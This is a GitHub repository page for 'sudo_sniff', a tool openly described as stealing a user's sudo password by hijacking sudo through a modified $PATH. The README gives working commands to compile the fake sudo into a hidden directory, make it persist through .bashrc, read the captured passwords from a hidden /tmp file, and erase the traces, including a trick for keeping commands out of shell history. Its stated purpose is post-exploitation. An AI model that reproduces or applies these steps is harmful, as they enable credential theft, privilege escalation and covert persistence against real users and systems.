Skip to content

Steal user's password when running sudo for post-exploitation purposes

Notifications You must be signed in to change notification settings

dubs3c/sudo_sniff

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

sudo_sniff

sudo_sniff is a simple program that attempts to steal the user's password while running sudo without arousing any suspicion. The idea is to modify the user's $PATH in order to hijack sudo when executed by the user. This could be used in post-exploitation as an alternative route for acheiving root acces (given that the user has the correct permissions).

sudo_sniff will store both correct and incorrect password entries at the following location per default: /tmp/.temp5678

Improvements

  • Hide the victim's input
  • Add function to either send the password to attacker or save it on disk.
  • sudo may be in different locations on different systems, perhaps implement a function to locate it
  • [BUG] When the victim enters his input, the text asking for the password will be printed multiple times.

Usage

hunter@nsa:~$ git clone git@github.com:mjdubell/sudo_sniff.git
hunter@nsa:~$ cd sudo_sniff/
hunter@nsa:~$ make
hunter@nsa:~$ ./sudo whoami

Post Exploitation

victim@server:~$ mkdir $HOME/.payload
victim@server:~$ gcc -Wall -g -o $HOME/.payload/sudo sudo_sniff.c
victim@server:~$ echo 'export PATH="$HOME/.payload:$PATH"' >> $HOME/.bashrc

Note: Make sure sudo is executable.

Cleanup
victim@server:~$ rm -rf $HOME/.payload; rm /tmp/.temp5678; sed '/export PATH="$HOME\/\.payload:$PATH"/d' .bashrc > tmp && mv tmp .bashrc

Note: If the HISTCONTROL environment variable is set to "ignorespace" or "ignoreboth", adding a space before the command will prevent it from showing up when running history.

Retrieve the password
victim@server:~$ cat /tmp/.temp5678
victim:mypasword:ERROR
victim:mypassword:SUCCESS

Contributing

  1. Fork it!
  2. Create your feature branch: git checkout -b my-new-feature
  3. Commit your changes: git commit -am 'Add some feature'
  4. Push to the branch: git push origin my-new-feature
  5. Submit a pull request :D

About

Steal user's password when running sudo for post-exploitation purposes

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •